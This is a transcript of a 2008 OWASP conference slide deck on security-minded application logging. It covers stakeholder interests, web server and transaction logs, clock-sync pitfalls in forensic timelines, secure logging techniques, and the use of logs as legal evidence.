copyright © eddy vanlerberghe permission is granted to copy, distribute and/or modify this document...
TRANSCRIPT
![Page 1: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/1.jpg)
Copyright © Eddy VanlerberghePermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Logging: not just a good idea
October 23, 2008
Eddy Vanlerberghe
![Page 2: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/2.jpg)
2OWASP
Introduction
Logging often not formally planned or designed
Frequently insufficient in case of incidents Implemented by developers “as they go”Registered in insecure locationsRelevance of logged information
inadequate
![Page 3: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/3.jpg)
3OWASP
Definition
“Information produced by an application that is not strictly required for its core functionality.”
![Page 4: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/4.jpg)
4OWASP
Border Case: User Visible Error Messages
Volatile nature: not permanently recordedUsually contents not intended for end-userMay reveal too much information for
attackersOften result of insecure configuration at
server-sideSometimes due to undocumented
“features” of third-party components
![Page 5: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/5.jpg)
5OWASP
Different Interested parties
DeveloperSystem AdministratorMarketingAuditalt.hackers.malicious ...
![Page 6: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/6.jpg)
6OWASP
Developer's Interest
“If an error occurs, I want to know what to modify in which lines of which files.”
Personal angle: “Look how quickly I can fix any bug!”
Security angle: minimize downtime, fix errors as soon as possible
![Page 7: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/7.jpg)
7OWASP
System Administrator's Interest
“Do we need bigger iron/network pipes?” “Why is the system reacting so slow
today?” “Where did that daemon come from and
who changed my root password?”Security angle: confidentiality, integrity and
availability
![Page 8: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/8.jpg)
8OWASP
Marketing Interest
“Why are people skipping that super-duper flash movie we payed big bucks for?”
Security angle: ???
![Page 9: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/9.jpg)
9OWASP
Audit Interest
“It wasn't our fault and here is the proof!”Security angle: non-repudiation,
accountability
![Page 10: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/10.jpg)
10OWASP
Hacker's Interest
“So, what is the name of that table containing the creditcard details in their database?”
Security angle: information leading to successful attacks, destruction or obfuscation of proof pointing in their direction
![Page 11: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/11.jpg)
11OWASP
Web Server Logs
TimestampRemote IP addressRequested resourceRequest result status and return length
127.0.0.1 - - [25/Jul/2008:14:59:20 +0200] "GET /dokuwiki/lib/exe/js.php?edit=0&write=1 HTTP/1.1" 200 16902
127.0.0.1 - - [25/Jul/2008:14:59:21 +0200] "POST /dokuwiki/doku.php HTTP/1.1" 302 -
![Page 12: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/12.jpg)
12OWASP
Web Server Logs (cont.)
Full request content not available: no cookies, no POST-ed parameters
Response content not available: no cookies being set, only total length of response
IP address does not equal “Jane Doe, 1600 Pennsylvania Ave NW, Washington, DC 20500”
Are ALL requests recorded? (can errors cause logging to be skipped?)
IP address is often the internal address of a load balancer, reverse proxy or WAF
![Page 13: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/13.jpg)
13OWASP
Typical Application Logs
Are usually intended for developers only (e.g. “13/10 12:13:14 Tx 88944890 started”)
Not always taking multithreading issues into account: three consecutive log entries can be from two different threads, and information of different threads may not be in chronological order
Often not part of up-front design, especially with respect log management (backups, log rotation, access rights,...)
![Page 14: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/14.jpg)
14OWASP
Transaction Related Logs
Intended to be used for official actions such as settling disputes, input for accounting (e.g. number of transactions executed per month) etc.
Part of up-front designShould be reviewed for intended purposes:
Is logged information sufficient for intended purpose?
Is the logged data stored securely?What are the policies and procedures for
handling backups? (off-site, encrypted,...)
![Page 15: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/15.jpg)
15OWASP
Example Setup
User
Hax0r
InternetSSLTerminator/ReverseProxy
WebApplicationServer
![Page 16: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/16.jpg)
16OWASP
Data Flow
Web service uses one URL for all transaction requests (“/doTransaction.jsp”)
User sends cookie containing account numberBack end server executes transactions on
behalf of account specified in cookieBack end logs transaction data: time, source
account, destination account, amount, description, IP address reverse proxy
Reverse proxy logs “POST” requestsClocks of proxy and web server are not sync'd
![Page 17: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/17.jpg)
17OWASP
Log Contents
Proxy:1.2.3.4 - - [2008-07-11:14:59:20] "POST http://webserver/doTransaction.jsp HTTP/1.1" 200 12345.6.7.8 - - [2008-07-11:14:59:20] "POST http://webserver/doTransaction.jsp HTTP/1.1" 200 1122
Web Server:10.0.0.2 - - [2008-07-11:14:57:33] "POST /doTransaction.jsp HTTP/1.1" 200 123410.0.0.2 - - [2008-07-11:14:57:33] "POST /doTransaction.jsp HTTP/1.1" 200 1234
Application Log:10.0.0.2 2008-07-11:14:57:33 123456789012 210987654321 5000 Electricity10.0.0.2 2008-07-11:14:57:33 123456789012 111222333444 5000 Electricity
![Page 18: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/18.jpg)
18OWASP
Typical Questions To Be Answered
When?Who?What?
Where?How?Why?
Logging with security in mind: questions that need answers based on available logged information:
![Page 19: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/19.jpg)
19OWASP
When?
Can be required to determine the "Who"? (typically dynamic IP addresses are re-used by multiple persons over time)
Often used to link information from different logging sources (e.g. for building timelines during forensic investigations)
Importance of accurate system clocks across all systems involved
![Page 20: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/20.jpg)
20OWASP
Who?
Ask yourself: if something happens, do I have enough information to identify the culprit?
Physical person? Organization?Remote IP address (beware of reverse
proxies, load balancers or WAFs) Indication of open WiFi being abused?Application level identification? (usernames,
account numbers,...)May need help from law enforcement for
resolving IP address in owner information
![Page 21: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/21.jpg)
21OWASP
What?
Ideally: all traffic going in and outOften not realisticMinimum:
TimeRemote IPResource accessed + parameters suppliedResult status + most important info returnedDiagnostics generated during handling of
requestApplication specific required electronic evidence
(digital signatures, ...)
![Page 22: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/22.jpg)
22OWASP
Where?
Identify which component generated the log entry (WAF filter? Application digital signature verification?...)
Location of intruder? Insider? (involve human resource departement?)Domestic attacker? (case for local LE?)Foreign attacker? (block entire countries from
site?)
![Page 23: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/23.jpg)
23OWASP
How?
Investigate how an intrusion occurredWhich weaknesses were abused?Can the incident occur again? (e.g. if an old
server, with old software was replaced as part of the containment, the new situation may be more secure)
What would be the most effective ways to block the intrusion from happening again? (helps to prioritize new protective measures)
![Page 24: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/24.jpg)
24OWASP
Why?
Can be used to prevent attacks being launched by taking away the reason why they occurred
If disgruntled customer: keep them happier?
If disgruntled employee: look at ways to keep employees happier?
"Because I can": not much to do against that motive except building a fortress
![Page 25: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/25.jpg)
25OWASP
“Secure Logging”
Implement chain-like functionality: line counters (signed) hashes of previous record(s)
Use independent, isolated log servers in a physically controlled environment
Use write-once devices Include digital signatures on each line
provided by dedicated “notarial” systems
![Page 26: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/26.jpg)
26OWASP
If Push Comes To Shove...
Court case: in Belgium the goal is to convince the judge(s) that you are right and the other party is wrong
Electronic evidence is different compared to paper documents
Make up for possible uncertainty by:Redundant logging by independent systemsShow how logging is produced by automated
processesKeep several generations of backups in
physically different, but secured, locations
![Page 27: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/27.jpg)
27OWASP
Proactive Usage of Log Info
Implement monitoring on generated log data
Define thresholds for “interesting” eventsCreate progressive escalation infrastructureBlock suspected malicious outsidersDangers:
False positivesBlocking of legitimate usersToo many escalation alerts erode their
effectiveness
![Page 28: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/28.jpg)
28OWASP
Handling Log Data
Can contain confidential informationPlan to be able to quickly look at part of
logged data (timeframe, origin based, ...)Make backupsPlan on long-term storageBeware of potential dangerous contents
(e.g. XSS attack as part of requested URL, referrer or user-agent string containing XSS,...)
![Page 29: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/29.jpg)
29OWASP
Conclusions
Logging is an important part of non-repudiation: record not only approvals/hashes/signatures, but also the entire process
Record sufficient information to reconstruct the path from user to database
Beware of time stamps from different systems and reverse proxies
Log data can contain confidential information and should be protected as such
Proactive measures can have undesired side effects
![Page 30: Copyright © Eddy Vanlerberghe Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation](https://reader037.vdocument.in/reader037/viewer/2022110205/56649c915503460f9494c28a/html5/thumbnails/30.jpg)
30OWASP
Questions?